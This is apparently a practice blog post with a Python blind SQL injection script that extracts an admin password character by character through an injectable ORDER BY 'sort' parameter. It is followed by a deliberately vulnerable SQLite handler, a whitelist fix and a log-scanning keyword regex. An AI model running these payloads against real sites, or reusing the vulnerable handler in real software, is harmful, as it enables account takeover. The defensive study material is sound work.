sqli practice
2020. 7. 14. 16:52 · 0x0B Web Hacking

I was asked not to disclose the source, so part of the payload is masked.
```python
import requests
import urllib3
import sys
import string  # ascii_letters

urllib3.disable_warnings()

url = "##CENSORED##"
cookie = {'PHPSESSID': '##CENSORED##'}

# Character set for the first pass: digits plus lowercase letters
brute = string.digits
brute += string.ascii_lowercase

'''
# First pass: find which characters occur anywhere in the admin password
print(f"[+] Brute => {brute}")
tmp = []
for ch in brute:
    params = {'sort': f",(select 1 from tb_lv10 where (select count(1) from tb_lv10 where id='admin' and pw LIKE '%{ch}%')!=1)",
    }
    res = requests.get(url, params=params, cookies=cookie)
    if res.text.count("admin") == 5:  # page rendered normally => the condition held
        #print(f"{ch}")
        tmp.append(ch)
print(f"This is admin password list {tmp}")
'''

# Query [Get Admin Password Length]
# ,(select%201%20from%20tb_lv10%20where%20(select%20count(*)%20from%20tb_lv10%20where%20id=%27admin%27%20and%20length(pw)=7)!=1)
# substr(pw,0,1)='g'

# Characters found by the first pass (masked by the author)
flag = ["##CENSORED##"]
print(flag)

# Second pass: recover the password one position at a time
index = 1
pw_len = 7  # length found with the query above
while index < pw_len + 1:
    for ch in flag:
        params = {'sort': f",(select 1 from table_1 where (select count(1) from table_1 where id='admin' and substr(pw,{index},1)='{ch}')!=1)",
        }
        res = requests.get(url, params=params, cookies=cookie)
        if res.text.count("admin") == 5:  # normal page => this character sits at this position
            print(f"{ch}")
    index += 1
```
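The script above works because the `sort` parameter is pasted straight after `ORDER BY`, so a value beginning with `,` appends a second, attacker-written sort expression. The following is an added example (not the post's code and not the challenge's source) showing the same flaw in a small SQLite-backed handler next to the standard fix, a whitelist of sort keys, plus a log check that flags SQL keywords in the `sort` parameter. The table, rows, password, endpoint path and access-log format are all constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the challenge's user table; the password is made up.
SAMPLE_ROWS = [
    ("admin", "s3cr3t7", "2020-01-01"),
    ("guest", "guest", "2020-03-01"),
    ("alice", "wonder", "2019-12-01"),
]

# Sort keys the application is willing to accept, mapped to real column names.
SORT_COLUMNS = {"id": "id", "created": "created"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_lv10 (id TEXT, pw TEXT, created TEXT)")
    conn.executemany("INSERT INTO tb_lv10 VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_users_vulnerable(conn, sort):
    """Mirrors the flaw the post exploits: the raw parameter is concatenated after
    ORDER BY, so a value starting with ',' adds an attacker-chosen sort expression.
    SQLite simply evaluates the subquery; MySQL's multi-row subquery error is what
    turns it into the true/false oracle the script reads."""
    sql = "SELECT id FROM tb_lv10 ORDER BY id" + sort
    return [row[0] for row in conn.execute(sql)]


def list_users_hardened(conn, sort, direction="asc"):
    """Only a whitelisted key and direction ever reach the SQL text. ORDER BY
    targets cannot be bound as query parameters, so a whitelist is the fix."""
    if sort not in SORT_COLUMNS or direction not in ("asc", "desc"):
        raise ValueError(f"unsupported sort option: {sort!r} {direction!r}")
    sql = f"SELECT id FROM tb_lv10 ORDER BY {SORT_COLUMNS[sort]} {direction}"
    return [row[0] for row in conn.execute(sql)]


# Detection side: SQL keywords have no business in a sort parameter.
SQL_TOKENS = re.compile(r"\b(select|union|from|where|sleep|benchmark)\b", re.IGNORECASE)

# Constructed access-log lines (format assumed). The first carries the post's
# length-probing payload, URL-encoded as a web server would log it.
LOG_LINES = [
    '10.0.0.5 - - [14/Jul/2020:16:52:00 +0900] "GET /list.php?sort=,(select%201%20from%20tb_lv10%20where%20(select%20count(*)%20from%20tb_lv10%20where%20id=%27admin%27%20and%20length(pw)=7)!=1) HTTP/1.1" 200 5120',
    '10.0.0.7 - - [14/Jul/2020:16:53:10 +0900] "GET /list.php?sort=id HTTP/1.1" 200 5120',
]


def suspicious_sort_requests(log_lines):
    """Return the percent-decoded sort values that contain SQL keywords."""
    hits = []
    for line in log_lines:
        m = re.search(r'"GET (\S+) HTTP/', line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query)  # parse_qs decodes %xx for us
        for value in query.get("sort", []):
            if SQL_TOKENS.search(value):
                hits.append(value)
    return hits


if __name__ == "__main__":
    db = make_db()
    payload = ",(select 1 from tb_lv10 where (select count(1) from tb_lv10 where id='admin' and pw LIKE '%s%')!=1)"
    print("vulnerable handler ran the payload:", list_users_vulnerable(db, payload))
    try:
        list_users_hardened(db, payload)
    except ValueError as exc:
        print("hardened handler:", exc)
    print("flagged sort values:", suspicious_sort_requests(LOG_LINES))
```

The vulnerable handler accepts the post's first-pass payload without complaint, which is exactly the property the blind probe relies on; the hardened one rejects anything that is not a known key, so there is no SQL text left for the attacker to shape. The keyword regex is a first-pass triage filter for `sort`-style parameters, not a general SQLi detector: it will miss obfuscated input and should be paired with server-side rejection, not used instead of it.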